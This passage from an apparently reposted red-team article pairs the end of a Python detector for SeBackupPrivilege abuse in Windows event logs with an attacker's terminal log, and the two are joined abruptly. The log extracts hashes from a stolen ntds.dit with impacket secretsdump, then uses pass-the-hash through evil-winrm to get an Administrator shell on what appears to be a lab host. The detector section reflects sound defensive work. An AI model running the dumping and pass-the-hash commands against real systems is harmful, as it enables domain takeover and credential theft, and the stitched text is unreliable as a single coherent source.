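        account = f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}".lower()
        if ev["EventID"] == 4672:
            privs = set(re.split(r"[\s,]+", ev.get("PrivilegeList", "").strip()))
            hit = sorted(privs & {"SeBackupPrivilege", "SeRestorePrivilege"})
            if hit and account not in EXPECTED_BACKUP_PRIVILEGE_HOLDERS:
                findings.append(Finding("unexpected_backup_privilege_logon", account, ", ".join(hit)))
        elif ev["EventID"] == 4688:
            image = _basename(ev.get("NewProcessName", ""))
            cmd = _norm(ev.get("CommandLine", ""))
            # Commands issued through a WinRM session are spawned by wsmprovhost.exe.
            via = (" via WinRM (parent wsmprovhost.exe)"
                   if _basename(ev.get("ParentProcessName", "")) == "wsmprovhost.exe" else "")
            for rule, wanted_image, pattern in PROCESS_RULES:
                if image == wanted_image and re.search(pattern, cmd):
                    findings.append(Finding(rule, account, cmd + via))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.account}: {f.evidence}")
```

The privileged copy itself (Copy-FileSeBackupPrivilege) is an in-process API call inside the PowerShell host, so it produces no 4688 event of its own; the rules therefore key on the snapshot and export tooling (ntdsutil ifm, robocopy /B, diskshadow /s, vssadmin create shadow, reg save of a sensitive hive) and on a 4672 assignment of SeBackupPrivilege to an account that is not expected to hold it. The first 4672 for the non-admin account is the earliest signal in this chain and fires before any file is touched.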
The network blew up again, but luckily I had already pulled down ntds.dit before it died.
Now all that is left is the extraction using system.save.
apple@macos evil-winrm % ls -l
total 69640
-rw-r--r-- 1 apple staff 0 May 10 17:30 brew
-rw-r--r-- 1 apple staff 255 May 10 17:33 help.txt
-rw-r--r-- 1 apple staff 16777216 May 11 01:35 ntds.dit
-rw-r--r-- 1 apple staff 18075648 May 11 02:24 system.save
apple@macos evil-winrm % python ~/security/impacket/examples/secretsdump.py -ntds ntds.dit -system system.save LOCAL
Impacket v0.14.0.dev0+20260317.95020.1049826e - Copyright Fortra, LLC and its affiliated companies
apple@macos evil-winrm % evil-winrm -i 10.146.145.84 -u Administrator -H 9653xxxxxxxxx
Evil-WinRM shell v3.9
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd "C:/Users/Administrator/Desktop/"
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2021 6:05 AM 37 flag.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
Disclaimer:
The programs and techniques in this article are intended solely for lawful, compliant security research and teaching, with the aim of improving cyber-security defences; they are of a clearly technical research nature.
Any organisation or individual who, without authorisation, uses the content of this article for attacks, sabotage or other illegal purposes bears sole responsibility for all resulting legal liability, civil compensation and joint liability; this site assumes no joint liability.
All content on this site is published for technical exchange and knowledge sharing; in case of copyright infringement or other objections, please get in touch by e-mail via the contact link at the top of the page.
Reposted from: 皇后红队 Asuna Asuna, "[Internal penetration] Forcibly enabling SeBackupPrivilege via .NET reflection, combined with a VSS volume shadow copy to bypass the exclusive lock, finally taking the domain controller's ntds.dit" (original title: 《【内网渗透】通过.NET反射强行激活SeBackupPrivilege,并配合VSS卷影拷贝绕过独占锁,最终拿下域控ntds.dit。》)
Copyright notice
This site only keeps an archival copy, for research and teaching reference only.
Readers who use the information for other purposes bear all legal and joint liability themselves; this site accepts no responsibility.